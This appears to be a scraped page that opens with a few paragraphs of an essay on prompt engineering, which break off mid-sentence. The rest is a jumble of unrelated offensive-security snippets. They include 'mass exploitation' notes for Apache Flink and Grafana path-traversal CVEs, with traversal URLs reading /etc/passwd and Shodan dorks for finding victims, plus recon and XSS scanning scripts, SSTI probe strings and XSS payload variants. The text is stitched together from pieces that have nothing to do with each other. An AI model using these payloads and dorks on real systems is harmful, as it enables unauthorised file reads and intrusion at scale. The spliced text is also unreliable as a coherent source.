Jann Moon scumdestroy

You probably don't know how to do Prompt Engineering

(This post could also be titled "Features missing from most LLM front-ends that should exist")

Apologies for the snarky title, but there has been a huge amount of discussion around so called "Prompt Engineering" these past few months on all kinds of platforms. Much of it is coming from individuals who are peddling around an awful lot of "Prompting" and very little "Engineering".

Most of these discussions are little more than users finding that writing more creative and complicated prompts can help them solve a task that a more simple prompt was unable to help with. I claim this is not Prompt Engineering. This is not to say that crafting good prompts is not a difficult task, but it does not involve doing any kind of sophisticated modifications to general "template" of a prompt.

Others, who I think do deserve to call themselves "Prompt Engineers" (and an awful lot more than that), have been writing about and utilizing the rich new eco-system

	Mass exploitation of Apache Flink RESTful API Arbitrary File Read vulnerability [CVE-2020-17519]

	Description: A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process.

	Shodan Dork : 'Apache Flink'

	Affected Version : 1.11.1 and 1.11.2

	Vulnerable URL :
	https://host:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

	Mass exploitation of Grafana 8.x Path Traversal (Pre-Auth) vulnerability (CVE-2021-43798).

	Description: Grafana is an open-source platform for monitoring and observability. Grafana versions 8.0.0-beta1 through 8.3.0 (except for patched versions) is vulnerable to directory traversal, allowing access to local files.
	Users are advised to upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1.

	Vulnerable URL :
	http://IP:PORT/public/plugins/alertlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd

	Shodan Dork : http.title:"grafana"

	#!/usr/bin/env bash
	go_version=$(curl -ks https://golang.org/VERSION?m=text)
	red_color="\e[31m"
	green_color="\e[32m"
	no_color="\e[0m"
	type -P go &> /dev/null && echo -e "Current go version is ${green_color}$(go version \| awk '{print $3}')${no_color}" \|\| echo -e "${red_color}Go is not installed on your system${no_color}"
	echo -e "Downloading latest go into your system - version ${green_color}${go_version}${no_color}"
	sudo apt purge --auto-remove golang-go 2> /dev/null &> /dev/null
	sudo apt clean &> /dev/null
	wget https://dl.google.com/go/${go_version}.linux-amd64.tar.gz -q --no-check-certificate 2> /dev/null

	#!/bin/bash
	#Requirements: KXSS(https://github.com/Emoe/kxss), Dalfox (https://github.com/hahwul/dalfox), QSreplace(https://github.com/tomnomnom/qsreplace)
	#Preparation: subfinder -d target.tld -all -silent \| httpx -silent \| gauplus --random-agent -b eot,jpg,jpeg,gif,css,tif,tiff,png,ttf,otf,woff,woff2,ico,pdf,svg,txt -t 100 -o params.txt && cat params.txt \| gf xss \| sed "s/'/ /g" \| sed "s/(/ /g" \| sed "s/)/ /g" \| qsreplace "FUZZ" 2> /dev/null \| anew -q testparams.txt
	#Usage: ./inxss.sh testparams.txt target.tld
	lists=$1
	mkout=$(echo -e "$2_$(date +%F_%H_%M_%S)")
	mkdir -p $mkout
	echo -e "Total $(cat $1 \| wc -l) targets loaded"
	sleep 6s
	echo -e "[$(date +"%F %H:%M:%S")] Starting scan..."

	#!/bin/bash
	# Task Killer
	# Helps you to kill unnecessary tasks running on linux and ubuntu.
	echo -e "$1 - Killing task..."
	totaltask=$(ps aux \| grep "$1" \| sed '/grep/d' \| wc -l)
	echo -e "Total $totaltask tasks found"
	sleep 3s
	ps aux \| grep "$1" \| sed '/grep/d' \| awk '{print $2}' \| while read -r line; do kill $line; done &> /dev/null
	exit 1

	#!/bin/bash
	targets=$1
	mkdir -p protpscan
	# requirements: https://github.com/detectify/page-fetch, https://github.com/tomnomnom/waybackurls, https://github.com/bp0lr/gauplus, https://github.com/R0X4R/Fuzzy, https://github.com/jaeles-project/gospider, https://snapcraft.io/chromium
	# usage: subfinder -d target.com -all -silent \| httpx -silent \| anew -q /home/targets.txt && ./protpscan.sh /home/targets.txt
	cd protpscan 2> /dev/null
	echo -e "Total $(cat $targets \| wc -l) domains loaded to scan"
	echo -e "Increasing scope..."
	xargs -a $targets -P 50 -I % bash -c "echo % \| waybackurls" 2> /dev/null \| anew -q wayback.txt
	cat $targets \| gauplus --random-agent -b eot,jpg,jpeg,gif,css,tif,tiff,png,ttf,otf,woff,woff2,ico,pdf,svg,txt -t 300 -o gauplus.txt &> /dev/null

	alpblog
	www
	%20%20%20%20s3
	%20%20www
	%20.
	%20675-ybi-674
	%20assets
	%20b92
	%20connect
	%20databank

	check-ssti{{77}}[[11]]
	check-ssti{{7*7}}
	check-ssti{{7*'7'}}
	check-ssti<%= 7 * 7 %>
	check-ssti${7*7}
	check-ssti${{7*7}}
	check-ssti@(7*7)
	check-ssti#{7*7}
	check-ssti#{ 7 * 7 }

	// How many ways can you alert(document.domain)?
	// Comment with more ways and I'll add them :)
	// I already know about the JSFuck way, but it's too long to add (:

	// Direct invocation
	alert(document.domain);
	(alert)(document.domain);
	al\u0065rt(document.domain);
	al\u{65}rt(document.domain);
	window['alert'](document.domain);